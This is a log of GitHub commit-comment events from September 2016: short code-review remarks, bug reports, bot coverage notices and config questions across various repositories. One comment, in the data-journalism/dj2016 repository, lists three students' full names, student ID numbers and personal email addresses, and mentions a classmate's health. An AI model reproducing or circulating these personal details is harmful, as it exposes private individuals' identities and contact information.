{"id":"4629089674","type":"CommitCommentEvent","actor":{"login":"vishal1shukla2"},"repo":{"name":"krishhub/Students"},"payload":{"comment":{"id":19203644,"position":2,"line":5,"path":"app/components/students/myModal-controller.js","commit_id":"e0ab5e6435ba9b1626e6b6b3eed0c10c84b9b63d","created_at":"2016-09-28T08:02:38Z","updated_at":"2016-09-28T08:02:38Z","body":"Is this controller being used?"}},"created_at":"2016-09-28T08:02:38Z"}
{"id":"4629090247","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19203646,"position":null,"line":null,"path":null,"commit_id":"deb5a5b96bae208eab17ff88465d33b099d66bb4","created_at":"2016-09-28T08:02:46Z","updated_at":"2016-09-28T08:02:46Z","body":"Involves issue #31"}},"created_at":"2016-09-28T08:02:46Z"}
{"id":"4629092797","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"dok1qq/IMDBParser"},"payload":{"comment":{"id":19203655,"position":56,"line":122,"path":"IMDBParser/Parser.cs","commit_id":"503d4e45bdf8c7498e751fe7f4655b8299404bc9","created_at":"2016-09-28T08:03:20Z","updated_at":"2016-09-28T08:03:20Z","body":"Так и не исправил именование метода."}},"created_at":"2016-09-28T08:03:20Z"}
{"id":"4629094295","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19203661,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T08:03:43Z","updated_at":"2016-09-28T08:03:43Z","body":"Just totally useless knowing that we're going to refactor everything using  BackBone.js"}},"created_at":"2016-09-28T08:03:43Z"}
{"id":"4629099871","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19203676,"position":null,"line":null,"path":null,"commit_id":"da39a99e542db4f41cb3618da42cd4b1fb09abc9","created_at":"2016-09-28T08:05:03Z","updated_at":"2016-09-28T08:05:03Z","body":"saw approval from jedmccaleb\nat https://github.com/vogel/stellar-core/commit/da39a99e542db4f41cb3618da42cd4b1fb09abc9"}},"created_at":"2016-09-28T08:05:03Z"}
{"id":"4629099888","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19203677,"position":null,"line":null,"path":null,"commit_id":"da39a99e542db4f41cb3618da42cd4b1fb09abc9","created_at":"2016-09-28T08:05:03Z","updated_at":"2016-09-28T08:05:03Z","body":"merging vogel/stellar-core/history-status-fix = da39a99e into auto"}},"created_at":"2016-09-28T08:05:03Z"}
{"id":"4629099913","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19203678,"position":null,"line":null,"path":null,"commit_id":"da39a99e542db4f41cb3618da42cd4b1fb09abc9","created_at":"2016-09-28T08:05:04Z","updated_at":"2016-09-28T08:05:04Z","body":"vogel/stellar-core/history-status-fix = da39a99e merged ok, testing candidate = 48a9b8cd"}},"created_at":"2016-09-28T08:05:04Z"}
{"id":"4629100136","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"dok1qq/IMDBParser"},"payload":{"comment":{"id":19203679,"position":47,"line":114,"path":"IMDBParser/Parser.cs","commit_id":"503d4e45bdf8c7498e751fe7f4655b8299404bc9","created_at":"2016-09-28T08:05:07Z","updated_at":"2016-09-28T08:05:07Z","body":"Все можно завернуть в одно Xpath выражение, не знаю будет ли быстрее, но вроде должно"}},"created_at":"2016-09-28T08:05:07Z"}
{"id":"4629101224","type":"CommitCommentEvent","actor":{"login":"stefan-balke"},"repo":{"name":"stefan-balke/auswertung-heike-balke"},"payload":{"comment":{"id":19203683,"position":3,"line":3,"path":"LICENSE.md","commit_id":"ba9333242d7cca5e603563926ece9c4b130bcb37","created_at":"2016-09-28T08:05:21Z","updated_at":"2016-09-28T08:05:21Z","body":"ooops :)"}},"created_at":"2016-09-28T08:05:21Z"}
{"id":"4629101719","type":"CommitCommentEvent","actor":{"login":"sebastian-nagel"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19203685,"position":62,"line":62,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T08:05:28Z","updated_at":"2016-09-28T08:05:28Z","body":"Stupid. This will register the items again for removal. Should not recursively call InProcessQueue.remove(key) but finally remove the items from the HashMap, e.g., by calling\r\n```\r\n        private V removeFinally(Object key) {\r\n            return super.remove(key);\r\n        }\r\n```\r\nThat's probably the reason for the assertion failures causing the workers to die:\r\n```\r\n2016-09-26 16:47:27.033 o.a.s.util [ERROR] Async loop died!\r\njava.lang.AssertionError\r\n        at com.google.common.cache.LocalCache$Segment.getNextEvictable(LocalCache.java:2684) ~[stormjar.jar:?]\r\n        at com.google.common.cache.LocalCache$Segment.evictEntries(LocalCache.java:2668) ~[stormjar.jar:?]\r\n        at com.google.common.cache.LocalCache$Segment.put(LocalCache.java:2887) ~[stormjar.jar:?]\r\n        at com.google.common.cache.LocalCache.put(LocalCache.java:4149) ~[stormjar.jar:?]\r\n        at com.google.common.cache.LocalCache$LocalManualCache.put(LocalCache.java:4754) ~[stormjar.jar:?]\r\n        at com.digitalpebble.stormcrawler.elasticsearch.persistence.AbstractElasticSearchSpout$InProcessMap.remove(AbstractElasticSearchSpout.java:84) ~[stormjar.jar:?]\r\n        at com.digitalpebble.stormcrawler.elasticsearch.persistence.AggregationSpout.ack(AggregationSpout.java:398) ~[stormjar.jar:?]\r\n```"}},"created_at":"2016-09-28T08:05:28Z"}
{"id":"4629107485","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"dok1qq/IMDBParser"},"payload":{"comment":{"id":19203698,"position":111,"line":168,"path":"IMDBParser/Parser.cs","commit_id":"503d4e45bdf8c7498e751fe7f4655b8299404bc9","created_at":"2016-09-28T08:06:48Z","updated_at":"2016-09-28T08:06:48Z","body":"MagicStrings - плохая практика: если что поменяется придется менять во многих местах."}},"created_at":"2016-09-28T08:06:48Z"}
{"id":"4629110681","type":"CommitCommentEvent","actor":{"login":"vishal1shukla2"},"repo":{"name":"krishhub/Students"},"payload":{"comment":{"id":19203703,"position":9,"line":13,"path":"app/components/students/student-form.ctrl.js","commit_id":"6379cbca24784400f2c0496dde399b5770390203","created_at":"2016-09-28T08:07:32Z","updated_at":"2016-09-28T08:07:32Z","body":"That's pretty cool. \r\n\r\nIn case if you need city typeahead at multiple places, you may want to have dedicated CityTypeAheadController in separate file. (In future it would ideally be directive)\r\n\r\nOtherwise, you don't need separate controller at all - you can just have $scope.student.city, $scope.cities and $scope.modelOptions in StudentFormCtrl itself."}},"created_at":"2016-09-28T08:07:32Z"}
{"id":"4629114705","type":"CommitCommentEvent","actor":{"login":"stephlocke"},"repo":{"name":"Azure/azure-webjobs-sdk"},"payload":{"comment":{"id":19203709,"position":33,"line":29,"path":"src/Microsoft.Azure.WebJobs.ServiceBus/EventHubs/EventHubAsyncCollector.cs","commit_id":"d4c2302a5dfeb9b2309d8d5e4e5648ced4ed306e","created_at":"2016-09-28T08:08:30Z","updated_at":"2016-09-28T08:08:30Z","body":"You could do * 1024 on this? You'd get a few more messages in that way"}},"created_at":"2016-09-28T08:08:30Z"}
{"id":"4629116958","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":19203714,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-28T08:09:02Z","updated_at":"2016-09-28T08:09:02Z","body":"Why do this?"}},"created_at":"2016-09-28T08:09:02Z"}
{"id":"4629117927","type":"CommitCommentEvent","actor":{"login":"makrebs"},"repo":{"name":"Dronesmith-tech/Firmware"},"payload":{"comment":{"id":19203715,"position":null,"line":null,"path":null,"commit_id":"6799c6bd64c368ee76931e2db6711d39dc1dda7f","created_at":"2016-09-28T08:09:17Z","updated_at":"2016-09-28T08:09:17Z","body":"Thanks, this seems to have fixed the low output voltage e.g. on USART2 and UART4"}},"created_at":"2016-09-28T08:09:17Z"}
{"id":"4629118184","type":"CommitCommentEvent","actor":{"login":"AlexGalays"},"repo":{"name":"AlexGalays/loop"},"payload":{"comment":{"id":19203716,"position":null,"line":null,"path":null,"commit_id":"40fbcbeee46f7c1cc7a46be716cdc460cd78fc89","created_at":"2016-09-28T08:09:21Z","updated_at":"2016-09-28T08:09:21Z","body":"Sure thing :)"}},"created_at":"2016-09-28T08:09:21Z"}
{"id":"4629133713","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":19203739,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-28T08:13:00Z","updated_at":"2016-09-28T08:13:00Z","body":"Why do this?"}},"created_at":"2016-09-28T08:13:00Z"}
{"id":"4629133897","type":"CommitCommentEvent","actor":{"login":"pchaigno"},"repo":{"name":"Alhadis/REST-GreenWalk"},"payload":{"comment":{"id":19203740,"position":null,"line":null,"path":null,"commit_id":"5c1147729966b76ea4fb92813cde3f9f48052229","created_at":"2016-09-28T08:13:03Z","updated_at":"2016-09-28T08:13:03Z","body":"You mean \"Commits on *Sep 24, 2016*\"? I'm guessing that's the date you pushed those commits upstream, while *1 Nov 2011* is the actual commit date... Not sure though."}},"created_at":"2016-09-28T08:13:03Z"}
{"id":"4629136698","type":"CommitCommentEvent","actor":{"login":"MatthiasHertel"},"repo":{"name":"humhub/humhub-modules-custom-pages"},"payload":{"comment":{"id":19203747,"position":null,"line":null,"path":null,"commit_id":"b2bff948725aaa0cd98456c67e7560b0cb98ca5e","created_at":"2016-09-28T08:13:42Z","updated_at":"2016-09-28T08:13:42Z","body":"is it now possible to set the defaultRoute param to a custompage route ?\r\nthe default value is /dashboard/dashboard, can i set it to a custompage?\r\n\r\nlike:\r\n`'defaultRoute' => '/p/landing_page';`\r\n\r\n\r\ni have the problem that humhub routes me to dashboard (not after login ... that works like a charme) but if i have an open session and i open humhub in a new tab i want a route to my custom landing page instead of the dashboard...\r\n\r\ni guess i have to setup the defaultRoute param in the file below - **is it right ?**\r\n\r\n`humhub/protected/humhub/config/web.php`\r\n\r\n```\r\n<?php\r\n\r\n$config = [\r\n    'id' => 'humhub',\r\n    'bootstrap' => ['humhub\\components\\bootstrap\\LanguageSelector'],\r\n    'defaultRoute' => '/dashboard/dashboard',\r\n    // 'defaultRoute' => ['/custom_pages/view/index', 'id' => 15],\r\n    // 'user' => [\r\n    //     'returnUrl' => ['/custom_pages/view/index', 'id' => 15],\r\n    // ]\r\n    // 'defaultRoute' => '/index.php?r=custom_pages%2Fview&id=15',\r\n    'layoutPath' => '@humhub/views/layouts',\r\n    'components' => [\r\n        'request' => [\r\n            'class' => 'humhub\\components\\Request',\r\n        ],\r\n        'user' => [\r\n            'class' => 'humhub\\modules\\user\\components\\User',\r\n            'identityClass' => 'humhub\\modules\\user\\models\\User',\r\n            'enableAutoLogin' => true,\r\n            'loginUrl' => ['/user/auth/login']\r\n        ],\r\n        'errorHandler' => [\r\n            'errorAction' => 'error/index',\r\n        ],\r\n        'session' => [\r\n            'class' => 'humhub\\modules\\user\\components\\Session',\r\n            'sessionTable' => 'user_http_session',\r\n        ],\r\n    ],\r\n    'modules' => [],\r\n];\r\n\r\nreturn $config;\r\n```"}},"created_at":"2016-09-28T08:13:42Z"}
{"id":"4629137303","type":"CommitCommentEvent","actor":{"login":"YutongFeng"},"repo":{"name":"data-journalism/dj2016"},"payload":{"comment":{"id":19203749,"position":null,"line":null,"path":null,"commit_id":"428b0060712cd2f558eeca92c75cfe5ec357eedd","created_at":"2016-09-28T08:13:51Z","updated_at":"2016-09-28T08:13:51Z","body":"李劼 151050038 1185032332@qq.com \r\n凤羽桐 151050015 251713767@qq.com \r\n王君梁 151050070 2763137805@qq.com \r\n老师您好，这是我们新的分组，原来Xintongyutongjie分组名单中的王馨桐由于身体原因，本学期的课程暂时没法参加，所以分组改成现在这个。 麻烦您了！"}},"created_at":"2016-09-28T08:13:51Z"}
{"id":"4629137474","type":"CommitCommentEvent","actor":{"login":"bakwc"},"repo":{"name":"bakwc/PornDetector"},"payload":{"comment":{"id":19203750,"position":null,"line":null,"path":null,"commit_id":"89abea8584ca3f68735951efcf667aafcc17daf0","created_at":"2016-09-28T08:13:54Z","updated_at":"2016-09-28T08:13:54Z","body":"BTW, still it's not working with python3."}},"created_at":"2016-09-28T08:13:54Z"}
{"id":"4629140027","type":"CommitCommentEvent","actor":{"login":"pinterf"},"repo":{"name":"pinterf/mvtools"},"payload":{"comment":{"id":19203756,"position":null,"line":null,"path":null,"commit_id":"52d5a6a0e533ea1957aaf14ad42975ed6cce3171","created_at":"2016-09-28T08:14:28Z","updated_at":"2016-09-28T08:14:28Z","body":"The two clips should be essentially identical, and thanks to the 10 bit histogram, we can see that the bits over 8 bit are nicely used.\r\nDifferences may occur because the Super/Analyze flow is 16 or 8 bit, repectively.\r\n```\r\na=Avisource(\"Hi8.avi\").assumefps(25,1).trim(0, 499)\r\n\r\nov=4 #2\r\n\r\na=a.ConvertToYUV444() # work on YV24 / YUV444P16\r\n\r\nx=a.ConvertBits(16)\r\nsup = x.MSuper(pel=1) #pel=2\r\nfv1 = sup.MAnalyse(isb=false, delta=1 , overlap=ov)\r\nbv1 = sup.MAnalyse(isb=true, delta=1 , overlap=ov)\r\nfv2 = sup.MAnalyse(isb=false, delta=2 , overlap=ov)\r\nbv2 = sup.MAnalyse(isb=true, delta=2 , overlap=ov)\r\nsup16=x.ConvertBits(16).MSuper(pel=1) #left here for easily changing test cases\r\nclip16 = x.ConvertBits(16).MDegrain2(Sup16, bv1, fv1, bv2, fv2, thSAD=10000).Histogram(\"Levels\",bits=10)\r\nclip16\r\n\r\nx=a\r\nsup = x.MSuper(pel=1) #pel=2\r\nfv1 = sup.MAnalyse(isb=false, delta=1 , overlap=ov)\r\nbv1 = sup.MAnalyse(isb=true, delta=1 , overlap=ov)\r\nfv2 = sup.MAnalyse(isb=false, delta=2 , overlap=ov)\r\nbv2 = sup.MAnalyse(isb=true, delta=2 , overlap=ov)\r\nclip8 = x.MDegrain2(Sup, bv1, fv1, bv2, fv2, thSAD=10000, lsb=true).ConvertFromStacked().Histogram(\"Levels\",bits=10)\r\n\r\nStackVertical(clip8.ConvertBits(8), clip16.ConvertBits(8))\r\n```"}},"created_at":"2016-09-28T08:14:28Z"}
{"id":"4629140837","type":"CommitCommentEvent","actor":{"login":"caifara"},"repo":{"name":"fenec/passive_job"},"payload":{"comment":{"id":19203767,"position":null,"line":null,"path":null,"commit_id":"a564113024c64d221e8b0b6ed5fa1daf611d341d","created_at":"2016-09-28T08:14:38Z","updated_at":"2016-09-28T08:14:38Z","body":"Thank you sir, this is exactly what I'm looking for!"}},"created_at":"2016-09-28T08:14:38Z"}
{"id":"4629142464","type":"CommitCommentEvent","actor":{"login":"fixitsmkll"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19203781,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-28T08:15:00Z","updated_at":"2016-09-28T08:15:00Z","body":"![arenabugkey3](https://cloud.githubusercontent.com/assets/22385866/18905493/95a47974-858d-11e6-96fe-6940391398e7.png)\r\nBug Arena key = 3 not play arena.\r\nsorry for bad eng."}},"created_at":"2016-09-28T08:15:00Z"}
{"id":"4629143861","type":"CommitCommentEvent","actor":{"login":"pinterf"},"repo":{"name":"pinterf/mvtools"},"payload":{"comment":{"id":19203783,"position":null,"line":null,"path":null,"commit_id":"59172a42cb71a4d4fc4a07e465dbec8079fd5ee1","created_at":"2016-09-28T08:15:20Z","updated_at":"2016-09-28T08:15:20Z","body":"The two clips should be essentially identical, and thanks to the 10 bit histogram, we can see that the bits over 8 bit are nicely used.\r\nDifferences may occur because the Super/Analyze flow is 16 or 8 bit, repectively.\r\n```\r\na=Avisource(\"Hi8.avi\").assumefps(25,1).trim(0, 499)\r\n\r\nov=4 #2\r\n\r\na=a.ConvertToYUV444() # work on YV24 / YUV444P16\r\n\r\nx=a.ConvertBits(16)\r\nsup = x.MSuper(pel=1) #pel=2\r\nfv1 = sup.MAnalyse(isb=false, delta=1 , overlap=ov)\r\nbv1 = sup.MAnalyse(isb=true, delta=1 , overlap=ov)\r\nfv2 = sup.MAnalyse(isb=false, delta=2 , overlap=ov)\r\nbv2 = sup.MAnalyse(isb=true, delta=2 , overlap=ov)\r\nsup16=x.ConvertBits(16).MSuper(pel=1) #left here for easily changing test cases\r\nclip16 = x.ConvertBits(16).MDegrain2(Sup16, bv1, fv1, bv2, fv2, thSAD=10000).Histogram(\"Levels\",bits=10)\r\nclip16\r\n\r\nx=a\r\nsup = x.MSuper(pel=1) #pel=2\r\nfv1 = sup.MAnalyse(isb=false, delta=1 , overlap=ov)\r\nbv1 = sup.MAnalyse(isb=true, delta=1 , overlap=ov)\r\nfv2 = sup.MAnalyse(isb=false, delta=2 , overlap=ov)\r\nbv2 = sup.MAnalyse(isb=true, delta=2 , overlap=ov)\r\nclip8 = x.MDegrain2(Sup, bv1, fv1, bv2, fv2, thSAD=10000, lsb=true).ConvertFromStacked().Histogram(\"Levels\",bits=10)\r\n\r\nStackVertical(clip8.ConvertBits(8), clip16.ConvertBits(8))\r\n```"}},"created_at":"2016-09-28T08:15:20Z"}
{"id":"4629146016","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19203788,"position":null,"line":null,"path":null,"commit_id":"22509727a65afd0fe4800f46a7a24f768ead5ffb","created_at":"2016-09-28T08:15:50Z","updated_at":"2016-09-28T08:15:50Z","body":"[Code coverage](https://166-47334959-gh.circle-artifacts.com/0/home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-28T08:15:50Z"}
{"id":"4629147467","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19203794,"position":null,"line":null,"path":null,"commit_id":"6ddad41dbe999eaf6a914a8ffcc2bf1eaca2eba2","created_at":"2016-09-28T08:16:09Z","updated_at":"2016-09-28T08:16:09Z","body":"[Code coverage](https://167-47334959-gh.circle-artifacts.com/0/home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-28T08:16:09Z"}
{"id":"4629148212","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19203795,"position":4,"line":179,"path":"templates/partials/contacts_content.html","commit_id":"14c6f9c06eba1f839d7e70dbbc05610ec91a766f","created_at":"2016-09-28T08:16:19Z","updated_at":"2016-09-28T08:16:19Z","body":"I'm filtering in the controller, see l.298, `return !task.resolved && ...`\r\nThe RulesEngine does return the resolved ones, but the controller doesn't merge them in the $scope var."}},"created_at":"2016-09-28T08:16:19Z"}
{"id":"4629149340","type":"CommitCommentEvent","actor":{"login":"bartoszmajsak"},"repo":{"name":"lordofthejars/arquillian-cube-q"},"payload":{"comment":{"id":19203796,"position":6,"line":170,"path":"README.adoc","commit_id":"e910f6b226daa1a0970c103a8868494b86046bd6","created_at":"2016-09-28T08:16:35Z","updated_at":"2016-09-28T08:16:35Z","body":"I would consider rewording this sentence a bit - double `some` sounds a bit odd.\r\n\r\n> in toxics such as `slowClose`... \r\n\r\nmight sound better?"}},"created_at":"2016-09-28T08:16:35Z"}
{"id":"4629150200","type":"CommitCommentEvent","actor":{"login":"Thorvers"},"repo":{"name":"Thorvers/dierenasiel"},"payload":{"comment":{"id":19203801,"position":null,"line":null,"path":null,"commit_id":"d338245b465236d39bb5856d755fd488f88817e3","created_at":"2016-09-28T08:16:47Z","updated_at":"2016-09-28T08:16:47Z","body":"ehjhtrdfhngfbgnhttyjjh"}},"created_at":"2016-09-28T08:16:47Z"}
{"id":"4629151056","type":"CommitCommentEvent","actor":{"login":"sebastian-nagel"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19203805,"position":58,"line":58,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T08:16:59Z","updated_at":"2016-09-28T08:16:59Z","body":"Only the metric `beingProcessed` would change because the average size of beingProcessed will increase. The ack and fail methods would still decrement the partition key counts."}},"created_at":"2016-09-28T08:16:59Z"}
{"id":"4629152036","type":"CommitCommentEvent","actor":{"login":"pinterf"},"repo":{"name":"pinterf/mvtools"},"payload":{"comment":{"id":19203807,"position":null,"line":null,"path":null,"commit_id":"b11187f847746fbdac58a1ecac0de545c1056868","created_at":"2016-09-28T08:17:14Z","updated_at":"2016-09-28T08:17:14Z","body":"In the meantime, avs+ got 10-12-14 bit support besides the originally planned 16 bit-only.\r\nLet's prepare mvtools, too."}},"created_at":"2016-09-28T08:17:14Z"}
{"id":"4629152564","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19203808,"position":118,"line":94,"path":"Task1/Triangle.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T08:17:21Z","updated_at":"2016-09-28T08:17:21Z","body":"Сейчас тоже не понятно, потому что я забываю с чего начиналось название, когда дочитываю его до конца)"}},"created_at":"2016-09-28T08:17:21Z"}
{"id":"4629152755","type":"CommitCommentEvent","actor":{"login":"bartoszmajsak"},"repo":{"name":"lordofthejars/arquillian-cube-q"},"payload":{"comment":{"id":19203809,"position":10,"line":174,"path":"README.adoc","commit_id":"e910f6b226daa1a0970c103a8868494b86046bd6","created_at":"2016-09-28T08:17:24Z","updated_at":"2016-09-28T08:17:24Z","body":"\"to play with the values\" "}},"created_at":"2016-09-28T08:17:24Z"}
{"id":"4629154449","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19203816,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T08:17:48Z","updated_at":"2016-09-28T08:17:48Z","body":"also:\r\nhttp://www.yiiframework.com/wiki/175/how-to-create-a-rest-api/"}},"created_at":"2016-09-28T08:17:48Z"}
{"id":"4629154550","type":"CommitCommentEvent","actor":{"login":"bartoszmajsak"},"repo":{"name":"lordofthejars/arquillian-cube-q"},"payload":{"comment":{"id":19203817,"position":12,"line":176,"path":"README.adoc","commit_id":"e910f6b226daa1a0970c103a8868494b86046bd6","created_at":"2016-09-28T08:17:49Z","updated_at":"2016-09-28T08:17:49Z","body":"\"For example, this is how you can randomized the latency\""}},"created_at":"2016-09-28T08:17:49Z"}
{"id":"4629155716","type":"CommitCommentEvent","actor":{"login":"pinterf"},"repo":{"name":"pinterf/mvtools"},"payload":{"comment":{"id":19203820,"position":null,"line":null,"path":null,"commit_id":"ad7a623bfa220929cbdd7e07122849974cab492c","created_at":"2016-09-28T08:18:06Z","updated_at":"2016-09-28T08:18:06Z","body":"Overlaps still fail though"}},"created_at":"2016-09-28T08:18:06Z"}
{"id":"4629157176","type":"CommitCommentEvent","actor":{"login":"bartoszmajsak"},"repo":{"name":"lordofthejars/arquillian-cube-q"},"payload":{"comment":{"id":19203825,"position":4,"line":168,"path":"README.adoc","commit_id":"e910f6b226daa1a0970c103a8868494b86046bd6","created_at":"2016-09-28T08:18:26Z","updated_at":"2016-09-28T08:18:26Z","body":"How about title \"Adding some randomness\" instead?"}},"created_at":"2016-09-28T08:18:26Z"}
{"id":"4629157713","type":"CommitCommentEvent","actor":{"login":"jonenst"},"repo":{"name":"lutece-platform/lutece-core"},"payload":{"comment":{"id":19203827,"position":12,"line":429,"path":"src/java/fr/paris/lutece/portal/business/user/AdminUser.java","commit_id":"c9e3f4f82cb631bc499dddafd17bcc776c115aae","created_at":"2016-09-28T08:18:34Z","updated_at":"2016-09-28T08:18:34Z","body":"Nice catch, in the global pom we have source 1.7 and target 1.7, but we don't use the correct bootclasspath so these mistakes are not caught. (CI uses a java8 sdk apparently). I fixed it in 52b91bdd "}},"created_at":"2016-09-28T08:18:34Z"}
{"id":"4629158878","type":"CommitCommentEvent","actor":{"login":"sandy081"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19203833,"position":null,"line":null,"path":null,"commit_id":"65c60a8b3289a4dc1f45044b2e52fe891636cdf0","created_at":"2016-09-28T08:18:51Z","updated_at":"2016-09-28T08:18:51Z","body":"Fix #12740 "}},"created_at":"2016-09-28T08:18:51Z"}
{"id":"4629158988","type":"CommitCommentEvent","actor":{"login":"NuclearCookie"},"repo":{"name":"FishingCactus/openfl"},"payload":{"comment":{"id":19203834,"position":null,"line":null,"path":null,"commit_id":"db52625f9b564e73bca9c23ff43d98f7c61932cc","created_at":"2016-09-28T08:18:53Z","updated_at":"2016-09-28T08:18:53Z","body":"Just to let you know, branch is not compiling without mask_as_bitmap flag"}},"created_at":"2016-09-28T08:18:53Z"}
{"id":"4629159190","type":"CommitCommentEvent","actor":{"login":"AnastasiyaBabina"},"repo":{"name":"AnastasiyaBabina/TESTBDD"},"payload":{"comment":{"id":19203836,"position":1,"line":1,"path":".idea/compiler.xml","commit_id":"abd1ae1d70855baa9b78070e40d26104e6dc9519","created_at":"2016-09-28T08:18:56Z","updated_at":"2016-09-28T08:18:56Z","body":"test"}},"created_at":"2016-09-28T08:18:56Z"}
{"id":"4629159936","type":"CommitCommentEvent","actor":{"login":"bartoszmajsak"},"repo":{"name":"lordofthejars/arquillian-cube-q"},"payload":{"comment":{"id":19203840,"position":6,"line":170,"path":"README.adoc","commit_id":"e910f6b226daa1a0970c103a8868494b86046bd6","created_at":"2016-09-28T08:19:06Z","updated_at":"2016-09-28T08:19:06Z","body":"I would also suggest to link to some articles explaining what are those distributions - maybe wikipedia?"}},"created_at":"2016-09-28T08:19:06Z"}
{"id":"4629160300","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Defake/Triangle_01"},"payload":{"comment":{"id":19203841,"position":20,"line":15,"path":"Triangle.Test/TriangleTest.cs","commit_id":"b19f312417a9bb01677822e2ebadb0fb956765f8","created_at":"2016-09-28T08:19:10Z","updated_at":"2016-09-28T08:19:10Z","body":"Запихайте Triangle_01 в using в начале файла"}},"created_at":"2016-09-28T08:19:10Z"}
{"id":"4629161273","type":"CommitCommentEvent","actor":{"login":"bartoszmajsak"},"repo":{"name":"lordofthejars/arquillian-cube-q"},"payload":{"comment":{"id":19203843,"position":29,"line":193,"path":"README.adoc","commit_id":"e910f6b226daa1a0970c103a8868494b86046bd6","created_at":"2016-09-28T08:19:24Z","updated_at":"2016-09-28T08:19:24Z","body":"\"In the configuration above\"?"}},"created_at":"2016-09-28T08:19:24Z"}
{"id":"4629161420","type":"CommitCommentEvent","actor":{"login":"alvls"},"repo":{"name":"pavelbar/mp2-lab1-set"},"payload":{"comment":{"id":19203845,"position":null,"line":null,"path":null,"commit_id":"5777ef826c6d775341cc2d7bda6636feb71b2e1f","created_at":"2016-09-28T08:19:27Z","updated_at":"2016-09-28T08:19:27Z","body":"Потому что, раз оператор == уже реализован, то != - это вызов этого оператора и отрицание от него. Как результат, у вас один содержательный код, а не две его копии."}},"created_at":"2016-09-28T08:19:27Z"}
{"id":"4629162175","type":"CommitCommentEvent","actor":{"login":"bartoszmajsak"},"repo":{"name":"lordofthejars/arquillian-cube-q"},"payload":{"comment":{"id":19203846,"position":30,"line":194,"path":"README.adoc","commit_id":"e910f6b226daa1a0970c103a8868494b86046bd6","created_at":"2016-09-28T08:19:37Z","updated_at":"2016-09-28T08:19:37Z","body":"\"and send\""}},"created_at":"2016-09-28T08:19:37Z"}
{"id":"4629166890","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Defake/Triangle_01"},"payload":{"comment":{"id":19203860,"position":19,"line":14,"path":"Triangle.Test/TriangleTest.cs","commit_id":"b19f312417a9bb01677822e2ebadb0fb956765f8","created_at":"2016-09-28T08:20:42Z","updated_at":"2016-09-28T08:20:42Z","body":"Nazyuvat peremennyue translitom eto plohoy ton\r\nEsli ne znaete kak nazvat use google translate, please"}},"created_at":"2016-09-28T08:20:42Z"}
{"id":"4629167458","type":"CommitCommentEvent","actor":{"login":"YutongFeng"},"repo":{"name":"data-journalism/dj2016"},"payload":{"comment":{"id":19203861,"position":null,"line":null,"path":null,"commit_id":"e840ec691719900c1f5052d72b385fb11fb8a5ac","created_at":"2016-09-28T08:20:51Z","updated_at":"2016-09-28T08:20:51Z","body":"homework2"}},"created_at":"2016-09-28T08:20:51Z"}
{"id":"4629167989","type":"CommitCommentEvent","actor":{"login":"mogalia786"},"repo":{"name":"mogalia786/SchoolServer"},"payload":{"comment":{"id":19203864,"position":4,"line":16,"path":"School/ViewController.swift","commit_id":"4fd30d002c9b436de7a45c04a4dcf76b41b4f3ac","created_at":"2016-09-28T08:20:59Z","updated_at":"2016-09-28T08:20:59Z","body":"Developed to print hello school"}},"created_at":"2016-09-28T08:20:59Z"}
